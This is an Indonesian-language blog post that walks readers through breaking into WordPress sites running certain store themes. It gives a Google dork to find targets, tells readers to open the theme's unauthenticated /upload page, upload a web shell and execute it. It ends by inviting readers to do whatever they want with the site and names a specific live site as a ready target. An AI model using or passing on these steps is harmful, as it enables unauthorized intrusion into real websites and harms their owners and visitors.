skip to main |
skip to sidebar
Wah posting pertama nih, :-)
Moga lancar dan berkelanjutan, baru belajar juga blogging. Oke deh ga usah banyak basa-vasi langsung aja ....
cekidot..
Sekarang saya akan membahas bug pada wordpress, meskipun udah agak lama tapi masih banyak aja situs yang belummembereskan masalah ini.
=====================
dork : inurl:/wp-content/themes/WPstore/
kita dapat meng-upload backdoor dengan
vulnerability ini:
1. WPStore
2. eShop
3. KidzStore
4. Emporium 5. Store
klo udah dpet target, kita tambah /UPLOAD di target
tersebut... http://www.target.com/wp-content/
themes/Wpstore/upload
selanjutnya akan muncul file upload,sekarang kita
upload shell kesayangan.... klo udah di upload,
tinggal eksekusi shell kita... caranya : http://
www.target.com/wp-content/uploads/
products_img/namashell.php
selesai dehhh..... sekrang terserah mau di apain tuh
sitenya... :D
klo msih bngung, sya ksih live trgetnya.... http://
www.davidsteele.com/wp-content/themes/
WPStore/upload/
tinggal upload shell.....
0 comments:
Post a Comment